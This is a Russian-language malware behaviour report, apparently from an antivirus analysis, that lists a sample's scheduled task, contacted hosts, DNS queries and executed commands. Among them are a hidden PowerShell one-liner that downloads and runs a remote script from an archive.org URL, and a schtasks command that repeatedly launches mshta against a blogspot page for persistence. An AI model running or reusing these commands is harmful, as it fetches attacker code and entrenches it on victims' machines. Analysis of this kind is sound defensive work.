Техническая информация
- <SYSTEM32>\tasks\secotaksa
- '<SYSTEM32>\mshta.exe' http://www.bi##y.com/wuiqbnmksdagjsgjhavsdjna
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1104
- %TEMP%\1149368.cvr
- 'bi##y.com':80
- 'mu##########ihaimujhepanipilao.blogspot.com':443
- 'bl##ger.com':443
- 're#####es.blogblog.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- 'oc##.#tartssl.com':80
- 'mu##########ihaimujhepanipilao.blogspot.com':443
- 'bl##ger.com':443
- 'fo###.#oogleapis.com':443
- 'go#####analytics.com':443
- DNS ASK bi##y.com
- DNS ASK mu##########ihaimujhepanipilao.blogspot.com
- DNS ASK bl##ger.com
- DNS ASK re#####es.blogblog.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK go#####analytics.com
- DNS ASK oc##.#tartssl.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://ia801504.us.archive.org/22/items/sb_20210718/nana.txt') -useB);' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/nanaback.html\""' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h i'E'x(iwr('https://ia801504.us.archive.org/22/items/sb_20210718/nana.txt') -useB);
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""http://12###########48@randikhanaekminar.blogspot.com/p/nanaback.html\""